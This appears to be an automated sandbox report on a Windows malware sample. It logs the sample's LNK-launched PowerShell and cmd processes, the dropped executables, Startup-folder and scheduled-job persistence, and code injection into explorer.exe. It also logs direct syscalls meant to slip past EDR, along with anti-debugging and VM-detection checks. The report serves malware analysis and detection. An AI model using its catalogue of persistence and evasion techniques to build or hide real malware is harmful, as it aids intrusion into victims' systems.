Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB5401 push ecx; ret	19_2_6FEB5414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB51A1 push ecx; ret	19_2_6FEB51B4

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior

Drops PE files

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\paogviura	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\lejp	Jump to dropped file
Source: C:\Users\user\DZIPR.exe	File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\hello.exe	Jump to dropped file
Source: C:\Users\user\DZIPR.exe	File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Jump to dropped file

Drops PE files to the user directory

Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.dll			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.exe			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\paogviura	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\lejp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.dll			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.exe			Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp

Jump to behavior

Creates job files (autostart)

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\lnfast_x64.job

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PAOGVIURA
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\LEJP
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\GNQPMVVLBU
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RJHLRGWT

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE2DE29 IsIconic,GetWindowPlacement,GetWindowRect,	12_2_6FE2DE29
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C91DE29 IsIconic,GetWindowPlacement,GetWindowRect,	13_2_6C91DE29
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEADE29 IsIconic,GetWindowPlacement,GetWindowRect,	19_2_6FEADE29

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\DZIPR.exe	API/Special instruction interceptor: Address: 6C9B7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API/Special instruction interceptor: Address: 6C9B7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API/Special instruction interceptor: Address: 6C9B7945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6C9B3B54
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: F3A317

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4968			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4876			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\paogviura	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lejp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Users\user\DZIPR.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API coverage: 4.1 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API coverage: 4.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500	Thread sleep count: 4968 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 712	Thread sleep count: 4876 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6692	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7908	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	11_2_0040301A
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	11_2_00402B79
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE2748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	12_2_6FE2748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C91748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	13_2_6C91748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	19_2_6FEA748E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: hello.exe, 0000000B.00000002.1401612275.0000000000621000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6vmware
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: svchost.exe, 00000012.00000002.2496354459.00000174C5854000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: hello.exe, 0000000B.00000002.1401612275.0000000000621000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y%
Source: svchost.exe, 00000012.00000002.2495105676.00000174C002B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0Z

Source: C:\Users\user\DZIPR.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\DZIPR.exe

Code function: 12_2_6FE33F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

12_2_6FE33F34

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

11_2_00406D5D

Contains functionality to read the PEB

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25D78 mov eax, dword ptr fs:[00000030h]	12_2_6FE25D78
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25CA0 mov eax, dword ptr fs:[00000030h]	12_2_6FE25CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C915CA0 mov eax, dword ptr fs:[00000030h]	13_2_6C915CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5D78 mov eax, dword ptr fs:[00000030h]	19_2_6FEA5D78
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5CA0 mov eax, dword ptr fs:[00000030h]	19_2_6FEA5CA0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE33F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_6FE33F34
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_6FE3CE5C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE38034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_6FE38034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_6C92CE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C923F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_6C923F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C928034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_6C928034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB3F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6FEB3F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEBCE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_6FEBCE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB8034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6FEB8034

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6FE266A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6C982E3D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6FEA66A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FF0F4DD	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6C9166A2	Jump to behavior
Source: C:\Users\user\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x701066A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FF038F3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FF12B32	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 8164 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 8164 base: 4A0000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 4044 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 4044 base: 560000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 2056 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 2056 base: 400000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 1180 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 1180 base: 310000 value: 00	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
